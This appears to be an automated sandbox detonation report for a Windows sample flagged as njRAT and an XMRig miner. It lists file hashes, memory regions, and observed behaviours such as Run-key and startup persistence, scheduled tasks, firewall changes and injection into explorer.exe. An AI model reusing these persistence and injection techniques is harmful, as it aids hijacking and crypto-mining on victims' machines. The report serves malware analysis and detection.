SHA256 cbe1ee8865b7708628a772ed90466930c25addc2f74bb96556b98b395737bced
SHA512 2ca85136a23365d605d494eef31f576b99854156b8b065e813ab6fece43007764ee7e4c6f69552f1466110728860e6b5c325ae3f50655f796ab5611b4d3d9ab4

memory/2784-36-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 cf9824d2ca8b577db5549aa9d7272d28
SHA1 7dbd28e93fe90521d2803a6e5bf4d44817816e67
SHA256 2ca500e8dcdd8323efe3465c40d8ba496279ec4eff1dee732a89dadc1b595817
SHA512 a45207618ed98a4e51e9e0b9b27de437b9bded694810c79dc8fa2eae8bf0a658c6f615b1ed24b1ec463f6eaf23eae749c662d314c9a1a3270ce6aa0a12a40367

memory/2784-37-0x0000000077B20000-0x0000000077B30000-memory.dmp

memory/2784-38-0x000000013F080000-0x000000013F674000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 43e563ba4d0bb252af7a2aa6283e927e
SHA1 18839e465ebb25bbe676f5837d15f1d19919f073
SHA256 2805cbf90f4b2f3465de020ec50d9b5cae1422522bb2e4e92743448cf7878483
SHA512 d76254f0852878fa7701c32aadb2654597227afe236bf734cd878106ab8f487de0ac91ae286828306993b5d476a91b08fc1d010b3c027a19727a99b9bad977e5

memory/2816-24-0x0000000074700000-0x0000000074CAB000-memory.dmp

memory/2784-40-0x0000000002D10000-0x0000000002D90000-memory.dmp

memory/2784-39-0x0000000000900000-0x000000000090A000-memory.dmp

\Users\Admin\AppData\Local\Temp\services32.exe

MD5 f01e43f37937d0b65e9a8a43c5750f3d
SHA1 242bb759a05f6807f890515b8276102613ed7d41
SHA256 e6f5c7bcdd6c041820e510aa767641e37d56b4bf0d9de20bfa3bb3fb8c573409
SHA512 02c4fd0520b95a4f91ec7a9837953b6fc0e0b1ec53c0fe01f9389c07bbed210f14132c2c9796f241498d65eb2179fe333d7ff884883ba981a24ffcf160f0c289

C:\Users\Admin\AppData\Local\Temp\services32.exe

MD5 d08a0702492b7702e726648a903c2bd4
SHA1 4c6d93108d2afa87929cd68af747c50dbe3fc690
SHA256 3b6162e0b0c8133baac36786a243746a4dfc4622417f4b6fa230d5fb8f03694a
SHA512 3d21998ef5dd6c410f425cb2571e1fdae7dd363428ccb8434ed89062b0a39cc19e7854e3af4729aebdf9a4a4968f1093ef7df7aff0260b34e4d13ef5ec29b8b6

\??\c:\users\admin\appdata\local\temp\services32.exe

MD5 440839afc5edfabe611d23ba63689b18
SHA1 66c1b3d5eecbcb50fdf98722de5242368ab6a53a
SHA256 d95be3a4bd093e26c2f5cd8c6c76f9efec55c86893189bf9130ed8098398724a
SHA512 6275aa34dee71eb684afd93d66a9853cafa14ad2edc3842a161577614f224b92aaf4dad4bade85d88ab2d9b039672c6007b270e3fb3c839a2a609f6e2437324f

memory/2572-47-0x000000013F3F0000-0x000000013F9E4000-memory.dmp

memory/2784-51-0x000000013F080000-0x000000013F674000-memory.dmp

memory/2572-52-0x000000013F3F0000-0x000000013F9E4000-memory.dmp

memory/2572-54-0x000000013F3F0000-0x000000013F9E4000-memory.dmp

memory/2784-55-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2572-53-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2572-50-0x0000000077B20000-0x0000000077B30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 04fc844c321ea6afe57596424daab540
SHA1 306ee4be783571310d75593616516c2fbb0d7081
SHA256 05a8f4dbdf680ae0d47645082f476b39481b9e64c8c9ce6da10cf442a240417f
SHA512 3b5c39afd324388bc63cc4224c9137636f6e3cb8128aa4ce3494fc827543125d5da869dc640197a5a6c7ddf7c92b8eeb4618bca58ba5f25722f13701168f157c

\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 c882daefb788528213d6a6b879414c91
SHA1 cc5cee72aa8f93f357e7cce01affb4b64255b960
SHA256 3fc81c9304beaf3adaed483fb682191fdb36cd596a1469b915cac98a26d9e7c6
SHA512 4a8bd06afce4550cc685fd52156ff04cb047dc78d94c6df6e88dd31f60c0723189681bdbbe1b88499ef929542787c3a90475b9a0cc5b645256442a0e8fcc7cc4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 a065800e1cf43312fa33261cd7e43514
SHA1 fa715606adebabfffdf1643a693ce0bec63cc6a7
SHA256 56be1fe09d7fa000edbed809bc33ad6f06d2e3f3c08051658670063ae1977e26
SHA512 abd1ded5b7b34762a166177492bb99624c31ee3111445ca67ea09242e4fb7a74c3a8b12c2615394411314b38b2fc450f4a250a62352bec76388686e33fbbce60

memory/2656-61-0x00000000037C0000-0x0000000003DB6000-memory.dmp

\??\c:\users\admin\appdata\local\temp\rarsfx0\2_protected.exe

MD5 66698ddf93da72c025ce6c61626eea8b
SHA1 783b08bbc61396da8671d0947f9b807c55b06261
SHA256 9d60a66aae0b25af5fc1358a1e0c25f1d59aafb9ba4d6864aeaac7d824a3471f
SHA512 6e0e0dbf0b14b9b4c4ee393c32205ef32b678a9ba3196e62d52bc7bb35c2a75747be5218777ff735b894e9abc3867e7be3ebf605e4e965d1dc45a8cda4e7cd1f

memory/1660-62-0x000000013F3E0000-0x000000013F9D6000-memory.dmp

memory/2816-66-0x0000000074700000-0x0000000074CAB000-memory.dmp

memory/1660-67-0x000000013F3E0000-0x000000013F9D6000-memory.dmp

memory/1660-65-0x000000013F3E0000-0x000000013F9D6000-memory.dmp

memory/1660-69-0x0000000077B20000-0x0000000077B30000-memory.dmp

memory/2656-68-0x00000000037C0000-0x0000000003DB4000-memory.dmp

memory/1660-70-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2572-71-0x0000000002140000-0x00000000021C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

MD5 7f13e2b226baf92c8c7aa34606a33043
SHA1 957594155513bcb9adf119fbd683d6222c97b6f7
SHA256 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d
SHA512 a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1

memory/1976-79-0x000000013F950000-0x000000013F956000-memory.dmp

memory/2816-78-0x0000000002110000-0x0000000002150000-memory.dmp

memory/1976-80-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/1660-83-0x000000001C760000-0x000000001C7E0000-memory.dmp

memory/1976-82-0x00000000009B0000-0x0000000000A30000-memory.dmp

memory/1660-81-0x0000000002290000-0x000000000229E000-memory.dmp

memory/2816-93-0x0000000074700000-0x0000000074CAB000-memory.dmp

memory/1324-94-0x00000000001C0000-0x0000000000200000-memory.dmp

memory/1324-92-0x0000000074700000-0x0000000074CAB000-memory.dmp

\Users\Admin\AppData\Local\Temp\services64.exe

MD5 16ebd4fca1d15d1f5f7081a7d0c70117
SHA1 8e66abef95a4e5c56c2b5969d3768889d83b84fc
SHA256 e8c5369dcbfa832fa2c89505954150bc06949825bbfba45652d672432e4ab0b0
SHA512 20de09c6ec7d01a4a8b96245d1a6ff6f4a1ee10e5d845983ea1971c58056ffa35466742e83eef118543b29bdb50704cf95dca774fe0dc83ac148d0f7ad12a2ea

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 ad8e32e560028a95b88238df5dd1921d
SHA1 e675044b71e6e7ad85adb9de4cb7015af7b6e3a8
SHA256 f019927fb60f2d68540e35230d376caff608e2d143eb66ff79eac80ae206e43a
SHA512 e7f8add5e9e3b6f00b9541ebe93524043f2db11fb48afaacb0b26b41a2fe3aa0ad462546a1a393d21770584c4b4ce6aa885dad1b2b2886b77c76033f4e57291c

memory/2240-104-0x000000013FB20000-0x0000000140116000-memory.dmp

memory/1660-103-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2240-108-0x000000013FB20000-0x0000000140116000-memory.dmp

memory/2240-110-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2240-109-0x0000000077B20000-0x0000000077B30000-memory.dmp

memory/2572-107-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2240-106-0x000000013FB20000-0x0000000140116000-memory.dmp

memory/1660-102-0x000000013F3E0000-0x000000013F9D6000-memory.dmp

memory/1660-101-0x000000013FB20000-0x0000000140116000-memory.dmp

\??\c:\users\admin\appdata\local\temp\services64.exe

MD5 3eb73cdf10bf20d731c60ca91225f411
SHA1 ff7b384874010eb08a5cb8e82dd79ebd2c93b38b
SHA256 da1914439fd3b9730c3f0499a733da680332199ffef646d115a731a1877bbcfc
SHA512 056b909bd8576618a69d004e225aab3ad32d48402d25825a6896c54d70e0a3b958f3421ae2fa00cdf29303df597b942ca74242342440ad039f3c747cfb7f3dfb

memory/2240-111-0x000000001C130000-0x000000001C1B0000-memory.dmp

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 16379e3af6a104ba50f80465c44297b3
SHA1 23fa672955f7519aa8ab000977560fa952069052
SHA256 a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae
SHA512 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59

memory/3048-119-0x000000013F410000-0x000000013F416000-memory.dmp

memory/3048-121-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/3048-120-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/1976-122-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2572-125-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/2572-126-0x000000013F3F0000-0x000000013F9E4000-memory.dmp

memory/2276-129-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-131-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-133-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-134-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-135-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-137-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-138-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-136-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-139-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-140-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-141-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-143-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

memory/2276-145-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-142-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2240-151-0x000000013FB20000-0x0000000140116000-memory.dmp

memory/2276-153-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2240-152-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/1976-149-0x00000000009B0000-0x0000000000A30000-memory.dmp

memory/2276-148-0x0000000001DF0000-0x0000000001E10000-memory.dmp

memory/2276-147-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-155-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-157-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-156-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-158-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2276-154-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1324-159-0x0000000074700000-0x0000000074CAB000-memory.dmp

memory/3048-160-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

memory/3048-161-0x0000000002540000-0x00000000025C0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-22 11:15

Reported

2024-01-22 11:17

Platform

win10v2004-20231222-en

Max time kernel

149s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

Signatures

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\lear.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svhost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2424 set thread context of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3200 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 3200 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 3200 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 3200 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 3200 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 3200 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 3432 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 3432 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 1020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2776 wrote to memory of 4956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2776 wrote to memory of 4956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1020 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 1020 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 3432 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 3432 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 4648 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 4648 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 4648 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 4648 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 5116 wrote to memory of 1436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5116 wrote to memory of 1436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4912 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 4912 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 3312 wrote to memory of 4776 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sihclient.exe
PID 3312 wrote to memory of 4776 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sihclient.exe
PID 1956 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1956 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1956 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4912 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 4912 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 2424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2424 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2424 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 4612 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4612 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
